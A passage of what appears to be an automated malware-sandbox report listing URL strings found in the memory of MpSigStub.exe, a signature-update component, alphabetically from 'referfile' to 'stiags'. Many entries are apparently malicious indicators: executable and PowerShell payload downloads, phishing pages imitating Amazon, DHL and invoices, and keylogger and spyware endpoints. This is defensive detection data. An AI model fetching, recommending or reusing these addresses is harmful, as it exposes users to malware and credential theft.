Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://referfile.com
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://remitenow.one/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://rentalhabneew.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://rep.eyeez.com/GetArea.aspx
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://requestbin.net/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://resortelasrocas.cl/wp-content/plugins/js_compresor_wp/request.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://return.hk.cn/ma/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://rhriss.com.br/site/tmp/swagin
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://riyatraveltrip.com/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://ro-member1.com
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://romica-puceanu.com
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://rootedmoon.co.uk/css/syle.css.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://roybeth.com/ext/jquery.php
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://s01.yapfiles.ru/files/1017459/2.jpg
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://s2.bestmanage.org/?name=%s
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://sabadabe.xyz/_output2b172f0.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://saemaeul.mireene.com/skin/board/basic/bin
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/11.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/ejl.doc
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://samunphai.de/sup/dhli.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://sangorits.hopto.org/reply/updates.html/f
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://saraylimucevherat.com/docfile/good/)
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://scaladevelopments.scaladevco
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://scaladevelopments.scaladevco.com/17/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://schildersbedrijfdickrorije.nl/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/bene/dhl/dhl.php)
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://screenhost.pw/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://scrollayer.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://scud.pipis.net/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://searchengage.com
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://searchglobalsite.com/in.cgi?
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://seliconos.3utilities.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://sellercentral.amazon.de.e487y89hgwe97hr59ew.shanghaicounselor.net/step1.php
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://server00.send6.com/1abf8588/oluwa.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zl
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://sfofotky.iexam.info:8080/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://silberlivigno.com/outstanding-invoices/
Source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp	String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://skidochuks.de.nr
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://skidware-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://softthrifty.com/security.jsp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://solk.seamscreative.info:8080/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://sort.freedynamicdns.org/home/key.html/f
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://srlvonf.info/youtube.xpi
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://srv166997.hoster-test.ru/decidedly/barrier/barbara/seem/phaytd.dot
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://stat.02933.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
